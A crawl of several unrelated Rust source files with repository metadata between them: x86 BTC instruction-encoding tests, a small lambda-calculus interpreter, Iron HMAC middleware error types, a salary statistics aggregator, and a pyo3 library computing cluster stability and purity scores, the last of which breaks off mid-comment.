use instruction_def::*; use test::run_test; use Operand::*; use Reg::*; use RegScale::*; use RegType::*; use {BroadcastMode, Instruction, MaskReg, MergeMode, Mnemonic, OperandSize, Reg, RoundingMode}; #[test] fn btc_1() { run_test( &Instruction { mnemonic: Mnemonic::BTC, operand1: Some(Direct(BX)), operand2: Some(Literal8(35)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None, }, &[15, 186, 251, 35], OperandSize::Word, ) } #[test] fn btc_2() { run_test( &Instruction { mnemonic: Mnemonic::BTC, operand1: Some(IndirectDisplaced(DI, 9, Some(OperandSize::Word), None)), operand2: Some(Literal8(18)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None, }, &[15, 186, 125, 9, 18], OperandSize::Word, ) } #[test] fn btc_3() { run_test( &Instruction { mnemonic: Mnemonic::BTC, operand1: Some(Direct(SI)), operand2: Some(Literal8(69)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None, }, &[102, 15, 186, 254, 69], OperandSize::Dword, ) } #[test] fn btc_4() { run_test( &Instruction { mnemonic: Mnemonic::BTC, operand1: Some(IndirectDisplaced( EAX, 1407864443, Some(OperandSize::Word), None, )), operand2: Some(Literal8(125)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None, }, &[102, 15, 186, 184, 123, 78, 234, 83, 125], OperandSize::Dword, ) } #[test] fn btc_5() { run_test( &Instruction { mnemonic: Mnemonic::BTC, operand1: Some(Direct(DI)), operand2: Some(Literal8(54)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None, }, &[102, 15, 186, 255, 54], OperandSize::Qword, ) } #[test] fn btc_6() { run_test( &Instruction { mnemonic: Mnemonic::BTC, operand1: Some(Indirect(RDI, Some(OperandSize::Word), None)), operand2: Some(Literal8(92)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None, }, &[102, 15, 186, 63, 92], OperandSize::Qword, ) } #[test] fn btc_7() { run_test( &Instruction { mnemonic: Mnemonic::BTC, operand1: Some(Direct(EDI)), operand2: Some(Literal8(90)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None, }, &[102, 15, 186, 255, 90], OperandSize::Word, ) } #[test] fn btc_8() { run_test( &Instruction { mnemonic: Mnemonic::BTC, operand1: Some(IndirectScaledIndexedDisplaced( BX, SI, One, 26427, Some(OperandSize::Dword), None, )), operand2: Some(Literal8(64)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None, }, &[102, 15, 186, 184, 59, 103, 64], OperandSize::Word, ) } #[test] fn btc_9() { run_test( &Instruction { mnemonic: Mnemonic::BTC, operand1: Some(Direct(ESP)), operand2: Some(Literal8(48)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None, }, &[15, 186, 252, 48], OperandSize::Dword, ) } #[test] fn btc_10() { run_test( &Instruction { mnemonic: Mnemonic::BTC, operand1: Some(IndirectDisplaced( ESI, 424257545, Some(OperandSize::Dword), None, )), operand2: Some(Literal8(55)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None, }, &[15, 186, 190, 9, 168, 73, 25, 55], OperandSize::Dword, ) } #[test] fn btc_11() { run_test( &Instruction { mnemonic: Mnemonic::BTC, operand1: Some(Direct(EDX)), operand2: Some(Literal8(54)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None, }, &[15, 186, 250, 54], OperandSize::Qword, ) } #[test] fn btc_12() { run_test( &Instruction { mnemonic: Mnemonic::BTC, operand1: Some(IndirectScaledDisplaced( RDX, Four, 1238391808, Some(OperandSize::Dword), None, )), operand2: Some(Literal8(17)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None, }, &[15, 186, 60, 149, 0, 92, 208, 73, 17], OperandSize::Qword, ) } #[test] fn btc_13() { run_test( &Instruction { mnemonic: Mnemonic::BTC, operand1: Some(Direct(RDX)), operand2: Some(Literal8(59)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None, }, &[72, 15, 186, 250, 59], OperandSize::Qword, ) } #[test] fn btc_14() { run_test( &Instruction { mnemonic: Mnemonic::BTC, operand1: Some(IndirectScaledDisplaced( RDX, Four, 1833667555, Some(OperandSize::Qword), None, )), operand2: Some(Literal8(42)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None, }, &[72, 15, 186, 60, 149, 227, 139, 75, 109, 42], OperandSize::Qword, ) } #[test] fn btc_15() { run_test( &Instruction { mnemonic: Mnemonic::BTC, operand1: Some(Direct(DI)), operand2: Some(Direct(DI)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None, }, &[15, 187, 255], OperandSize::Word, ) } #[test] fn btc_16() { run_test( &Instruction { mnemonic: Mnemonic::BTC, operand1: Some(IndirectDisplaced(BP, 129, Some(OperandSize::Word), None)), operand2: Some(Direct(CX)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None, }, &[15, 187, 142, 129, 0], OperandSize::Word, ) } #[test] fn btc_17() { run_test( &Instruction { mnemonic: Mnemonic::BTC, operand1: Some(Direct(CX)), operand2: Some(Direct(SI)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None, }, &[102, 15, 187, 241], OperandSize::Dword, ) } #[test] fn btc_18() { run_test( &Instruction { mnemonic: Mnemonic::BTC, operand1: Some(IndirectDisplaced( EAX, 387689954, Some(OperandSize::Word), None, )), operand2: Some(Direct(DX)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None, }, &[102, 15, 187, 144, 226, 173, 27, 23], OperandSize::Dword, ) } #[test] fn btc_19() { run_test( &Instruction { mnemonic: Mnemonic::BTC, operand1: Some(Direct(SI)), operand2: Some(Direct(DI)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None, }, &[102, 15, 187, 254], OperandSize::Qword, ) } #[test] fn btc_20() { run_test( &Instruction { mnemonic: Mnemonic::BTC, operand1: Some(IndirectScaledIndexed( RDX, RCX, Eight, Some(OperandSize::Word), None, )), operand2: Some(Direct(SI)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None, }, &[102, 15, 187, 52, 202], OperandSize::Qword, ) } #[test] fn btc_21() { run_test( &Instruction { mnemonic: Mnemonic::BTC, operand1: Some(Direct(EBX)), operand2: Some(Direct(ECX)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None, }, &[102, 15, 187, 203], OperandSize::Word, ) } #[test] fn btc_22() { run_test( &Instruction { mnemonic: Mnemonic::BTC, operand1: Some(Indirect(SI, Some(OperandSize::Dword), None)), operand2: Some(Direct(EBP)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None, }, &[102, 15, 187, 44], OperandSize::Word, ) } #[test] fn btc_23() { run_test( &Instruction { mnemonic: Mnemonic::BTC, operand1: Some(Direct(EBX)), operand2: Some(Direct(EDI)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None, }, &[15, 187, 251], OperandSize::Dword, ) } #[test] fn btc_24() { run_test( &Instruction { mnemonic: Mnemonic::BTC, operand1: Some(IndirectScaledIndexedDisplaced( EDX, EBX, Two, 694273384, Some(OperandSize::Dword), None, )), operand2: Some(Direct(EDX)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None, }, &[15, 187, 148, 90, 104, 197, 97, 41], OperandSize::Dword, ) } #[test] fn btc_25() { run_test( &Instruction { mnemonic: Mnemonic::BTC, operand1: Some(Direct(ESP)), operand2: Some(Direct(ECX)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None, }, &[15, 187, 204], OperandSize::Qword, ) } #[test] fn btc_26() { run_test( &Instruction { mnemonic: Mnemonic::BTC, operand1: Some(IndirectScaledIndexed( RSI, RAX, Four, Some(OperandSize::Dword), None, )), operand2: Some(Direct(EBX)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None, }, &[15, 187, 28, 134], OperandSize::Qword, ) } #[test] fn btc_27() { run_test( &Instruction { mnemonic: Mnemonic::BTC, operand1: Some(Direct(RBP)), operand2: Some(Direct(RDI)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None, }, &[72, 15, 187, 253], OperandSize::Qword, ) } #[test] fn btc_28() { run_test( &Instruction { mnemonic: Mnemonic::BTC, operand1: Some(IndirectScaledIndexed( RDX, RBX, Four, Some(OperandSize::Qword), None, )), operand2: Some(Direct(RSI)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None, }, &[72, 15, 187, 52, 154], OperandSize::Qword, ) }
true
698e6a19185f20d159974b697f9b6d0bc37019ea
Rust
bpowers/liquid-types
/src/eval.rs
UTF-8
7,862
3.09375
3
[ "Apache-2.0", "MIT" ]
permissive
use std::collections::HashMap; use crate::common::Op2; use crate::lambdal::{Expr, Imm, Op}; type Closure = HashMap<String, Value>; #[derive(PartialEq, Eq, Debug, Clone)] pub enum Value { VInt(i64), VBool(bool), VClosure(Box<Closure>, String, Box<Expr>), VIntArray(Vec<i64>), } fn vint(v: Value) -> i64 { match v { Value::VInt(i) => i, _ => panic!("unreachable -- expected int not {:?}", v), } } fn vbool(v: Value) -> bool { match v { Value::VBool(b) => b, _ => panic!("unreachable -- expected bool not {:?}", v), } } fn vclosure(v: Value) -> (Box<Closure>, String, Box<Expr>) { match v { Value::VClosure(ctx, id, e) => (ctx, id, e), _ => panic!("unreachable -- expected closure not {:?}", v), } } fn vintarray(v: Value) -> Vec<i64> { match v { Value::VIntArray(a) => a, _ => panic!("unreachable -- expected intarray not {:?}", v), } } fn eval_op2(ctx: &Closure, op: Op2, l: &Op, r: &Op) -> Value { use self::Value::*; use crate::common::Op2::*; // all binary ops operate on ints, and at this point have passed // typechecking match op { LT | LTE | GT | GTE | Eq | Add | Sub | Mul => { let vl = vint(eval_op(ctx, l)); let vr = vint(eval_op(ctx, r)); match op { LT => VBool(vl < vr), LTE => VBool(vl <= vr), GT => VBool(vl > vr), GTE => VBool(vl >= vr), Eq => VBool(vl == vr), Add => VInt(vl + vr), Sub => VInt(vl - vr), Mul => VInt(vl * vr), _ => panic!("unreachable numerical op {:?}", op), } } And | Or | Impl | Iff => { let vl = vbool(eval_op(ctx, l)); let vr = vbool(eval_op(ctx, r)); match op { And => VBool(vl && vr), Or => VBool(vl || vr), _ => panic!("unreachable logic op {:?}", op), } } } } fn subst_imm(ctx: &Closure, id: &str, fix: &Imm, i: &Imm) -> Imm { use crate::lambdal::Imm::*; match i { Bool(b) => Bool(*b), Int(n) => Int(*n), Var(x) => { if x == id { fix.clone() } else { Var(x.clone()) } } Fun(vid, e) => { let e = Box::new(subst_expr(ctx, id, fix, e)); Fun(vid.clone(), e) } Fix(vid, e) => { let e = Box::new(subst_expr(ctx, id, fix, e)); Fix(vid.clone(), e) } V | Star => unreachable!("ν or ★ encountered during subst"), } } fn subst_op(ctx: &Closure, id: &str, fix: &Imm, o: &Op) -> Op { use crate::lambdal::Op::*; match o { Op2(op, e1, e2) => { let e1 = Box::new(subst_op(ctx, id, fix, e1)); let e2 = Box::new(subst_op(ctx, id, fix, e2)); Op2(*op, e1, e2) } MkArray(sz, n) => { let sz = Box::new(subst_imm(ctx, id, fix, sz)); let n = Box::new(subst_imm(ctx, id, fix, n)); MkArray(sz, n) } GetArray(iid, idx) => { let iid = Box::new(subst_imm(ctx, id, fix, iid)); let idx = Box::new(subst_imm(ctx, id, fix, idx)); GetArray(iid, idx) } SetArray(iid, idx, v) => { let iid = Box::new(subst_imm(ctx, id, fix, iid)); let idx = Box::new(subst_imm(ctx, id, fix, idx)); let v = Box::new(subst_imm(ctx, id, fix, v)); SetArray(iid, idx, v) } Imm(imm) => Imm(subst_imm(ctx, id, fix, imm)), } } // fixpoint substitution fn subst_expr(ctx: &Closure, id: &str, fix: &Imm, e: &Expr) -> Expr { use crate::lambdal::Expr::*; match e { If(e1, e2, e3) => { let e1 = Box::new(subst_imm(ctx, id, fix, e1)); let e2 = Box::new(subst_expr(ctx, id, fix, e2)); let e3 = Box::new(subst_expr(ctx, id, fix, e3)); If(e1, e2, e3) } Let(vid, e1, e2) => { let e1 = Box::new(subst_expr(ctx, id, fix, e1)); let e2 = Box::new(subst_expr(ctx, id, fix, e2)); Let(vid.clone(), e1, e2) } App(e1, e2) => { let e1 = Box::new(subst_imm(ctx, id, fix, e1)); let e2 = Box::new(subst_imm(ctx, id, fix, e2)); App(e1, e2) } Op(op) => Op(subst_op(ctx, id, fix, op)), } } fn eval_imm(ctx: &Closure, i: &Imm) -> Value { use self::Value::*; use crate::lambdal::Imm::*; match i { Bool(b) => VBool(*b), Int(i) => VInt(*i), Var(id) => match ctx.get(id) { Some(v) => v.clone(), None => panic!("lookup {} in ctx failed: {:?}", id, ctx), }, Fun(id, e) => VClosure(Box::new(ctx.clone()), id.clone(), e.clone()), Fix(id, e) => { let inner = eval(ctx, e); let (_, iid, ie) = vclosure(inner); let substituted_exp = Box::new(subst_expr(ctx, id, i, &ie)); VClosure(Box::new(ctx.clone()), iid, substituted_exp) } V | Star => unreachable!("ν or ★ encountered during subst"), } } fn eval_op(ctx: &Closure, o: &Op) -> Value { use self::Value::*; use crate::lambdal::Op::*; match o { Op2(op, e1, e2) => eval_op2(ctx, *op, e1, e2), MkArray(sz, n) => { let sz = vint(eval_imm(ctx, sz)); let n = vint(eval_imm(ctx, n)); let mut vec = Vec::with_capacity(sz as usize); vec.resize(sz as usize, n); VIntArray(vec) } GetArray(iid, idx) => { let arr = vintarray(eval_imm(ctx, iid)); let idx = vint(eval_imm(ctx, idx)); VInt(arr[idx as usize]) } SetArray(iid, idx, v) => { let mut arr = vintarray(eval_imm(ctx, iid)); let idx = vint(eval_imm(ctx, idx)); let v = vint(eval_imm(ctx, v)); arr[idx as usize] = v; VIntArray(arr) } Imm(imm) => eval_imm(ctx, imm), } } fn eval(ctx: &Closure, expr: &Expr) -> Value { use crate::lambdal::Expr::*; match expr { If(cond, e1, e2) => { if vbool(eval_imm(ctx, cond)) { eval(ctx, e1) } else { eval(ctx, e2) } } App(e1, e2) => { let v = eval_imm(ctx, e2); let (ctx, id, e) = vclosure(eval_imm(ctx, e1)); let mut new_ctx = ctx; new_ctx.insert(id, v); eval(&new_ctx, &e) } Let(id, e1, e2) => { let v1 = eval(ctx, e1); let mut new_ctx = ctx.clone(); new_ctx.insert(id.clone(), v1); eval(&new_ctx, e2) } Op(op) => eval_op(ctx, op), } } pub fn interpret(expr: &Expr) -> Value { let ctx: Closure = HashMap::new(); eval(&ctx, expr) } #[cfg(test)] macro_rules! test_eval( ($s:expr, $v:expr) => { { use crate::implicit_parse::ProgramParser; use crate::tok::Tokenizer; use crate::lambdal; let input = $s; let lexer = Tokenizer::new(&input); let iexpr = ProgramParser::new().parse(input, lexer).unwrap(); let (anf_expr, _) = lambdal::anf(&iexpr).unwrap(); let r = interpret(&anf_expr); if r != $v { die!("mismatch {:?} != {:?}", r, $v); } } } ); #[test] fn eval_results() { use self::Value::*; test_eval!("-22", VInt(-22)); test_eval!("let double = (fun n -> n*2) in double 8", VInt(16)); test_eval!( "let rec factorial = fun x -> if x = 0 then 1 else x * (factorial (x - 1)) in factorial 5", VInt(120) ); }
true
5d5acc62235ced530e528fd61b2efdb746e5caa5
Rust
ponchofiesta/webassembly-tests-rust
/benches/benchmarks.rs
UTF-8
482
2.578125
3
[ "Apache-2.0", "MIT" ]
permissive
#[macro_use] extern crate criterion; use criterion::Criterion; //use criterion::black_box; //fn a(data: &[f64]) -> f64 { // let mut a = 0.0; // for i in data { // let b: f64 = data.len() as f64 * i; // a += b; // } // a //} // //fn criterion_benchmark(c: &mut Criterion) { // let list = [1,2,3,4,5,6,7,8,9]; // c.bench_function("fib 20", |b| b.iter(|| a(&list))); //} // //criterion_group!(benches, criterion_benchmark); //criterion_main!(benches);
true
2fef6da0ea5607167cc677632995f337073dea88
Rust
jwilm/iron-hmac
/src/error.rs
UTF-8
3,041
2.796875
3
[ "Apache-2.0", "MIT", "LicenseRef-scancode-unknown-license-reference" ]
permissive
use std::fmt; use std::io; use iron::{IronError, status}; use std::str::Utf8Error; use rustc_serialize::hex::FromHexError; /// Error type for the hmac middleware #[derive(Debug)] pub enum Error { /// Some sort of io::Error occurred IoError(io::Error), /// The request's provided HMAC is invalid. InvalidHmac, /// The HMAC header is missing. The String value contains the expected header name. MissingHmacHeader(String), /// Error occurred while reading request body Bodyparser(::bodyparser::BodyError), /// Error interpreting byte sequence as utf8 Utf8Error(Utf8Error), /// Error decoding hex DecodingHex(FromHexError), } pub type Result<T> = ::std::result::Result<T, Error>; impl fmt::Display for Error { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { match *self { Error::MissingHmacHeader(ref key) => write!(f, "Missing Hmac Header (key = {})", key), Error::InvalidHmac => write!(f, "Provided HMAC is invalid"), Error::IoError(ref err) => write!(f, "IoError({})", err), Error::Bodyparser(ref err) => write!(f, "Bodyparser({})", err), Error::Utf8Error(ref err) => write!(f, "Utf8Error({})", err), Error::DecodingHex(ref err) => write!(f, "DecodingHex({})", err), } } } impl ::std::error::Error for Error { fn description(&self) -> &str { match *self { Error::MissingHmacHeader(_) => "The expected HMAC header is missing", Error::InvalidHmac => "Provided HMAC is invalid", Error::IoError(ref err) => err.description(), Error::Bodyparser(ref err) => err.description(), Error::Utf8Error(ref err) => err.description(), Error::DecodingHex(ref err) => err.description(), } } fn cause(&self) -> Option<&::std::error::Error> { match *self { Error::IoError(ref err) => Some(err), Error::Bodyparser(ref err) => Some(err), Error::Utf8Error(ref err) => Some(err), Error::DecodingHex(ref err) => Some(err), _ => None } } } impl From<Error> for IronError { fn from(err: Error) -> IronError { match err { Error::MissingHmacHeader(_) => IronError::new(err, status::BadRequest), Error::InvalidHmac => IronError::new(err, status::Forbidden), Error::DecodingHex(_) => IronError::new(err, status::Forbidden), _ => IronError::new(err, status::InternalServerError) } } } impl From<io::Error> for Error { fn from(err: io::Error) -> Error { Error::IoError(err) } } impl From<::bodyparser::BodyError> for Error { fn from(err: ::bodyparser::BodyError) -> Error { Error::Bodyparser(err) } } impl From<Utf8Error> for Error { fn from(err: Utf8Error) -> Error { Error::Utf8Error(err) } } impl From<FromHexError> for Error { fn from(err: FromHexError) -> Error { Error::DecodingHex(err) } }
true
1c1cf3aa403e062f0015b63a216efdea8e05ec67
Rust
OsProgramadores/op-desafios
/desafio-05/leovano/rust/src/stats/max.rs
UTF-8
1,943
2.78125
3
[]
no_license
use super::{BuildHasher, Entry, Map}; use super::{Funcionario, Salary}; use fields::Text; use std::sync::Arc; // Alias: MaxStats->Data #[allow(dead_code)] type MaxData<'a> = (usize, Salary, Vec<Arc<Funcionario<'a>>>); // Alias: MaxStats->Iter #[allow(dead_code)] type MaxIter<'a> = (Text<'a>, Salary, Vec<Arc<Funcionario<'a>>>); // Stats: Max #[derive(Debug, Default)] pub struct MaxStats<'a> { hash: Map<&'a [u8], MaxData<'a>, BuildHasher>, } impl<'a> MaxStats<'a> { pub(super) fn update(&mut self, func: &Arc<Funcionario<'a>>) { match self.hash.entry(func.sobrenome) { Entry::Occupied(e) => { let e = e.into_mut(); e.0 += 1; if e.1 < func.salario { e.2.clear(); e.1 = func.salario; e.2.push(Arc::clone(func)); } else if e.1 == func.salario { e.2.push(Arc::clone(func)); } } Entry::Vacant(e) => { e.insert((1, func.salario, vec![Arc::clone(func)])); } } } pub(super) fn merge(&mut self, other: MaxStats<'a>) { for (k, mut v) in other.hash { match self.hash.entry(k) { Entry::Occupied(e) => { let e = e.into_mut(); e.0 += v.0; if e.1 < v.1 { e.1 = v.1; e.2 = v.2; } else if e.1 == v.1 { e.2.append(&mut v.2); } } Entry::Vacant(e) => { e.insert(v); } } } } #[inline] pub fn into_iter(self) -> impl Iterator<Item = MaxIter<'a>> { self.hash .into_iter() .filter(|(_, it)| it.0 > 1) .map(|(ln, (_, b, c))| (Text(ln), b, c)) } }
true
141c13e752b0f373f75b7797f1ac77bb4ae87a6b
Rust
vinay-swamy/clustereval
/src/lib.rs
UTF-8
12,519
2.703125
3
[ "MIT" ]
permissive
use std::fs ; use std::collections::HashMap; use std::collections::HashSet; use std::iter::FromIterator; use std::iter::Iterator; use ndarray::Array2; use rayon; use rayon::prelude::*; use flate2::read::GzDecoder; use std::io::prelude::*; use glob::glob; use pyo3::prelude::*; use pyo3::wrap_pyfunction; #[derive(Debug)] struct ClusterResults { barcodes:Vec<i64>, labels: Vec<i64> , barcode_set:HashSet<i64>, grouped_barcodes: HashMap<i64, HashSet<i64>>, h_tot: f64, exp_name:String } #[pyclass] struct ExperimentResults{ #[pyo3(get)] exp_param :String, #[pyo3(get)] cluster_ids : Vec<i64>, #[pyo3(get)] stability_scores: Vec<f64>, #[pyo3(get)] purity_scores:Vec<f64> } impl ExperimentResults{ fn pprint(&self){ for i in 0..self.cluster_ids.len(){ println!("{},{},{}",&self.cluster_ids[i], &self.stability_scores[i],&self.purity_scores[i] ) } } fn write_csv(&self, outpath:&str)->std::io::Result<()>{ let mut lines: Vec<String> = vec![String::new();self.cluster_ids.len()]; for i in 0..self.cluster_ids.len(){ lines[i] = format!("{},{},{}\n",self.cluster_ids[i], self.stability_scores[i],self.purity_scores[i]) } let outfile = format!("{}/{}", outpath, self.exp_param); let outstring = lines.join(""); fs::write(outfile, outstring).unwrap(); Ok(()) } fn write_csv_simple(&self, outfile:&str)->std::io::Result<()>{ let mut lines: Vec<String> = vec![String::new();self.cluster_ids.len()]; for i in 0..self.cluster_ids.len(){ lines[i] = format!("{},{},{}\n",self.cluster_ids[i], self.stability_scores[i],self.purity_scores[i]) } let outstring = lines.join(""); fs::write(outfile, outstring).unwrap(); Ok(()) } } fn entropy(group_map: &HashMap<i64, HashSet<i64>>, labels:&Vec<i64> ) -> f64{ let n = labels.len() as f64; let res: f64 = group_map.values().map(|i|{ let p = i.len() as f64 /n; p * p.ln() }).sum(); return res * -1 as f64 } impl ClusterResults{ fn new(barcodes:Vec<i64>, labels: Vec<i64>, exp_name: String) -> ClusterResults{ let barcode_set: HashSet<i64> = HashSet::from_iter(barcodes.clone()); let mut grouped_barcodes:HashMap<i64, HashSet<i64>> = HashMap::new(); let mut old_label = &labels[0]; let mut current_label = &labels[0];// declare out here so we can add the last set back in let mut current_set: HashSet<i64> = HashSet::new(); for i in 0..barcodes.len(){ current_label = &labels[i]; let current_barcode = &barcodes[i]; if current_label == old_label{ current_set.insert(current_barcode.clone()); }else{// reach a new cluster let dup_check = grouped_barcodes.insert(old_label.clone(), current_set); if !dup_check.is_none(){ // HashMap.insert returns None when new key is added panic!("A duplicate key was added when making a ClusterResults; input data is not sorted by label") } let ns: HashSet<i64> = HashSet::new(); current_set = ns; current_set.insert(current_barcode.clone()); old_label = current_label; } } grouped_barcodes.insert(current_label.clone(), current_set); let h_tot = entropy(&grouped_barcodes, &labels); ClusterResults{barcodes, labels, barcode_set, grouped_barcodes, h_tot, exp_name} } fn head(&self){ println!("{:?}", &self.barcodes[0..5]); println!("{:?}", &self.labels[0..5]) } } fn stability_k(ref_bc: &HashSet<i64>, query:&ClusterResults) -> f64{ let intersect: HashSet<i64> = ref_bc.intersection(&query.barcode_set).cloned().collect::<HashSet<i64>>(); if intersect.len() == 0{ return 0.0 } else{ let mut new_bc :Vec<i64> = vec![-1; intersect.len()]; let mut new_labels : Vec<i64> = vec![-1; intersect.len()]; let mut j=0; for i in 0..query.barcodes.len(){ if intersect.contains(&query.barcodes[i]){ new_bc[j] = query.barcodes[i].clone(); new_labels[j] = query.labels[i].clone(); j+=1; } } let new_clu = ClusterResults::new(new_bc, new_labels, String::new());//use an empty string for these guys, as they get deleted later return entropy(&new_clu.grouped_barcodes, &new_clu.labels); } } fn decode_reader(bytes: Vec<u8>) -> std::io::Result<String> { let mut gz = GzDecoder::new(&bytes[..]); let mut s = String::new(); gz.read_to_string(&mut s)?; Ok(s) } fn read_cluster_results( file: &str) ->ClusterResults { let mut handle = fs::File::open(file).expect("Bad file input"); let mut buffer = Vec::new(); handle.read_to_end(&mut buffer).expect("couldnt read file"); let file_string = decode_reader(buffer).expect("bad gzip"); let file_string: Vec<&str> = file_string.lines().collect(); let mut barcodes: Vec<i64> = vec![-1; file_string.len()]; let mut labels: Vec<i64> = vec![-1; file_string.len()]; for i in 0..file_string.len(){ let line_split : Vec<&str> = file_string[i].split(",").collect(); barcodes[i] = String::from(line_split[0]).parse::<i64>().unwrap(); labels[i] = String::from(line_split[1]).parse::<i64>().unwrap(); } let exp_name = file.split("/").last().unwrap() ; ClusterResults::new(barcodes,labels, String::from(exp_name)) } fn calculate_metrics(ref_cluster:&ClusterResults, query_clusters: &Vec<&ClusterResults>) -> ExperimentResults{ let mut stability_results = Array2::<f64>::zeros(( ref_cluster.grouped_barcodes.len() ,query_clusters.len() )); let mut purity_results = Array2::<f64>::zeros(( ref_cluster.grouped_barcodes.len() ,query_clusters.len() )); for (i, cluster) in ref_cluster.grouped_barcodes.values().enumerate(){ for (j, experiment) in query_clusters.iter().enumerate() { let mut stab = stability_k(&cluster, &experiment) / experiment.h_tot ; if stab.is_nan(){// cant compare a naturally occuring NAN to f64::NAN stab = 1.0; } stability_results[[i, j]]= stab ; purity_results[[i,j]] = purity_k(&cluster, &experiment.grouped_barcodes) } } let stability_scores = stability_results.rows().into_iter().map(|x| 1.0 - x.mean().unwrap()).collect::<Vec<f64>>(); let purity_scores = purity_results.rows().into_iter().map( |x| { let mut v = x.to_vec(); v.retain(|x| *x != f64::NAN); // in purity_k f64::NAN is explicitly returned, so this works. Consider changing for conistency return vmean(v) } ).collect::<Vec<f64>>(); let cluster_ids: Vec<i64> = ref_cluster.grouped_barcodes.keys().cloned().collect::<Vec<i64>>() ; let exp_param = ref_cluster.exp_name.clone(); return ExperimentResults{ exp_param,cluster_ids, stability_scores, purity_scores } } fn vmean(v:Vec<f64>) -> f64{ return v.iter().sum::<f64>() / v.len() as f64 } fn purity_k(ref_bc_set: &HashSet<i64>, query_map: &HashMap<i64, HashSet<i64>>) -> f64{ let mut max_overlap = 0; let mut max_overlap_key:i64 = -100000000; for query_key in query_map.keys(){ let q_cluster_set = query_map.get(query_key).unwrap(); let overlap = ref_bc_set.intersection(q_cluster_set).count(); if overlap > max_overlap{ max_overlap = overlap; max_overlap_key = *query_key; } } if max_overlap_key == -100000000{ return f64::NAN; } else{ return max_overlap as f64 / query_map.get(&max_overlap_key).unwrap().len() as f64 } } fn run_pairwise_calculation_threaded(experiment_list:&Vec<&ClusterResults>, nthreads:usize) ->Vec<ExperimentResults>{ let pool = rayon::ThreadPoolBuilder::new().num_threads(nthreads).build().unwrap(); let dummy_array: Vec<usize> = (0..experiment_list.len()).collect(); let res: Vec<ExperimentResults> = pool.install(|| dummy_array.into_par_iter() .map(|i:usize| { let ref_clust = experiment_list[i]; let mut query_clusts = experiment_list.clone(); query_clusts.remove(i); return calculate_metrics(ref_clust, &query_clusts) }) .collect() ); return res } #[pyfunction] fn pairwise_metric_calculation_fromdisk(file_glob: &str, nthreads:usize) -> Vec<ExperimentResults> { let test_clusters_objs:Vec<ClusterResults> = glob(file_glob) .expect("Failed to read glob pattern") .map(|x|{let file = String::from(x.unwrap().to_str().expect("Failed to unwrap filename")); return read_cluster_results(&file)} ) .collect(); if test_clusters_objs.len() == 0{ panic!("The provided glob string did not match any files!!") } let test_cluster_refs: Vec<&ClusterResults> = test_clusters_objs.iter().collect(); let c_res :Vec<ExperimentResults> = run_pairwise_calculation_threaded(&test_cluster_refs, nthreads); return c_res } #[pyfunction] fn pairwise_metric_calculation_frommem(mut cluster_dfs: Vec<HashMap<String, Vec<i64>>>, exp_names:Vec<String>, nthreads:usize) -> Vec<ExperimentResults> { let clusters_objs_owned = cluster_dfs.into_iter().enumerate().map(|(i, mut x)|{ ClusterResults::new(x.remove(&String::from("Barcode")).unwrap(), x.remove(&String::from("labels")).unwrap(), exp_names[i].clone() )}).collect::<Vec<ClusterResults>>(); let clusters_objs_refs: Vec<&ClusterResults> = clusters_objs_owned.iter().collect(); let c_res :Vec<ExperimentResults> = run_pairwise_calculation_threaded(&clusters_objs_refs, nthreads); return c_res } #[pyfunction] fn metric_calculation_fromdf(mut ref_df: HashMap<String, Vec<i64>>, query_dfs:Vec<HashMap<String, Vec<i64>>>, exp_name: String)->ExperimentResults{ let ref_cluster = ClusterResults::new(ref_df.remove(&String::from("Barcode")).unwrap(), ref_df.remove(&String::from("labels")).unwrap(), exp_name); let query_clusters_owned = query_dfs.into_iter().map(|mut x|ClusterResults::new(x.remove(&String::from("Barcode")).unwrap(), x.remove(&String::from("labels")).unwrap(), String::from("perturbation") ) ).collect::<Vec<ClusterResults>>(); let query_clusters_refs = query_clusters_owned.iter().collect::<Vec<&ClusterResults>>(); let res = calculate_metrics(&ref_cluster, &query_clusters_refs); return res } // fn calc_metrics(module: &PyModule) -> PyResult<()> { // 